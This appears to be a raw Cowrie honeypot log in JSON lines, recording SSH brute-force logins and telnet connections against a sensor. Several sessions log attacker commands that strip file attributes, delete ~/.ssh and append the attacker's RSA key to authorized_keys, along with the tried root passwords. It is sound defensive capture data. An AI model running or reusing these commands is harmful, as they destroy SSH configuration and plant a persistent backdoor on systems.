{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T16:00:28.963827Z","src_ip":"212.227.235.229","session":"0fa2ff3ec683"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T16:00:28.964792Z","src_ip":"212.227.235.229","session":"0fa2ff3ec683"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T16:00:29.210700Z","src_ip":"212.227.235.229","session":"0fa2ff3ec683"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:00:29.211628Z","src_ip":"212.227.235.229","session":"0fa2ff3ec683"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40250,"dst_ip":"1.2.3.4","dst_port":22,"session":"e815663871b1","protocol":"ssh","message":"New connection: 212.227.235.229:40250 (1.2.3.4:22) [session: e815663871b1]","sensor":"my-vps","timestamp":"2025-08-28T16:00:29.418313Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T16:00:29.419383Z","src_ip":"212.227.235.229","session":"e815663871b1"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T16:00:29.643883Z","src_ip":"212.227.235.229","session":"e815663871b1"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T16:00:30.584303Z","src_ip":"212.227.235.229","session":"e815663871b1"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:00:31.811587Z","src_ip":"212.227.235.229","session":"e815663871b1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41294,"dst_ip":"1.2.3.4","dst_port":22,"session":"a9a7c96b2684","protocol":"ssh","message":"New connection: 212.227.235.229:41294 (1.2.3.4:22) [session: a9a7c96b2684]","sensor":"my-vps","timestamp":"2025-08-28T16:00:32.031797Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T16:00:32.032584Z","src_ip":"212.227.235.229","session":"a9a7c96b2684"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T16:00:32.250575Z","src_ip":"212.227.235.229","session":"a9a7c96b2684"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57800,"dst_ip":"1.2.3.4","dst_port":22,"session":"89d5a36daf7a","protocol":"ssh","message":"New connection: 212.227.235.229:57800 (1.2.3.4:22) [session: 89d5a36daf7a]","sensor":"my-vps","timestamp":"2025-08-28T16:00:32.519359Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T16:00:32.520078Z","src_ip":"212.227.235.229","session":"89d5a36daf7a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T16:00:32.837432Z","src_ip":"212.227.235.229","session":"89d5a36daf7a"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T16:00:33.160457Z","src_ip":"212.227.235.229","session":"a9a7c96b2684"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:00:33.379772Z","src_ip":"212.227.235.229","session":"a9a7c96b2684"}
{"eventid":"cowrie.session.closed","duration":"7.0","message":"Connection lost after 7.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:00:33.391775Z","src_ip":"212.227.235.229","session":"0fa2ff3ec683"}
{"eventid":"cowrie.login.failed","username":"deploy","password":"deploy@2025","message":"login attempt [deploy/deploy@2025] failed","sensor":"my-vps","timestamp":"2025-08-28T16:00:34.147270Z","src_ip":"212.227.235.229","session":"89d5a36daf7a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52060,"dst_ip":"1.2.3.4","dst_port":22,"session":"9b7986ccac8b","protocol":"ssh","message":"New connection: 212.227.235.229:52060 (1.2.3.4:22) [session: 9b7986ccac8b]","sensor":"my-vps","timestamp":"2025-08-28T16:00:35.360717Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T16:00:35.361527Z","src_ip":"212.227.235.229","session":"9b7986ccac8b"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:00:35.473248Z","src_ip":"212.227.235.229","session":"89d5a36daf7a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T16:00:35.568679Z","src_ip":"212.227.235.229","session":"9b7986ccac8b"}
{"eventid":"cowrie.login.success","username":"root","password":"p@Ssw0rd","message":"login attempt [root/p@Ssw0rd] succeeded","sensor":"my-vps","timestamp":"2025-08-28T16:00:36.438115Z","src_ip":"212.227.235.229","session":"9b7986ccac8b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T16:00:37.276437Z","src_ip":"212.227.235.229","session":"9b7986ccac8b"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T16:00:37.277415Z","src_ip":"212.227.235.229","session":"9b7986ccac8b"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T16:00:37.278640Z","src_ip":"212.227.235.229","session":"9b7986ccac8b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:00:37.486927Z","src_ip":"212.227.235.229","session":"9b7986ccac8b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T16:00:37.919969Z","src_ip":"212.227.235.229","session":"9b7986ccac8b"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T16:00:37.920724Z","src_ip":"212.227.235.229","session":"9b7986ccac8b"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T16:00:38.129747Z","src_ip":"212.227.235.229","session":"9b7986ccac8b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:00:38.130722Z","src_ip":"212.227.235.229","session":"9b7986ccac8b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53764,"dst_ip":"1.2.3.4","dst_port":22,"session":"159f38b160f3","protocol":"ssh","message":"New connection: 212.227.235.229:53764 (1.2.3.4:22) [session: 159f38b160f3]","sensor":"my-vps","timestamp":"2025-08-28T16:00:38.334570Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T16:00:38.335779Z","src_ip":"212.227.235.229","session":"159f38b160f3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T16:00:38.542156Z","src_ip":"212.227.235.229","session":"159f38b160f3"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T16:00:39.407844Z","src_ip":"212.227.235.229","session":"159f38b160f3"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:00:40.616481Z","src_ip":"212.227.235.229","session":"159f38b160f3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53780,"dst_ip":"1.2.3.4","dst_port":22,"session":"aedbfee0c619","protocol":"ssh","message":"New connection: 212.227.235.229:53780 (1.2.3.4:22) [session: aedbfee0c619]","sensor":"my-vps","timestamp":"2025-08-28T16:00:40.824806Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T16:00:40.825726Z","src_ip":"212.227.235.229","session":"aedbfee0c619"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T16:00:41.033653Z","src_ip":"212.227.235.229","session":"aedbfee0c619"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T16:00:41.906992Z","src_ip":"212.227.235.229","session":"aedbfee0c619"}
{"eventid":"cowrie.session.closed","duration":"6.8","message":"Connection lost after 6.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:00:42.119607Z","src_ip":"212.227.235.229","session":"9b7986ccac8b"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:00:42.120726Z","src_ip":"212.227.235.229","session":"aedbfee0c619"}
{"eventid":"cowrie.session.connect","src_ip":"180.180.156.25","src_port":42653,"dst_ip":"1.2.3.4","dst_port":23,"session":"835f3b7ba3c1","protocol":"telnet","message":"New connection: 180.180.156.25:42653 (1.2.3.4:23) [session: 835f3b7ba3c1]","sensor":"my-vps","timestamp":"2025-08-28T16:00:56.551879Z"}
{"eventid":"cowrie.session.closed","duration":13.840666770935059,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:01:10.392474Z","src_ip":"180.180.156.25","session":"835f3b7ba3c1"}
{"eventid":"cowrie.session.connect","src_ip":"119.28.118.184","src_port":55474,"dst_ip":"1.2.3.4","dst_port":23,"session":"2caeb568ce14","protocol":"telnet","message":"New connection: 119.28.118.184:55474 (1.2.3.4:23) [session: 2caeb568ce14]","sensor":"my-vps","timestamp":"2025-08-28T16:01:14.633528Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36022,"dst_ip":"1.2.3.4","dst_port":22,"session":"2216267ee493","protocol":"ssh","message":"New connection: 212.227.235.229:36022 (1.2.3.4:22) [session: 2216267ee493]","sensor":"my-vps","timestamp":"2025-08-28T16:01:35.175069Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T16:01:35.176016Z","src_ip":"212.227.235.229","session":"2216267ee493"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T16:01:35.393368Z","src_ip":"212.227.235.229","session":"2216267ee493"}
{"eventid":"cowrie.login.success","username":"root","password":"ZXCzxc123","message":"login attempt [root/ZXCzxc123] succeeded","sensor":"my-vps","timestamp":"2025-08-28T16:01:36.303673Z","src_ip":"212.227.235.229","session":"2216267ee493"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T16:01:36.759870Z","src_ip":"212.227.235.229","session":"2216267ee493"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T16:01:36.760650Z","src_ip":"212.227.235.229","session":"2216267ee493"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T16:01:36.761808Z","src_ip":"212.227.235.229","session":"2216267ee493"}
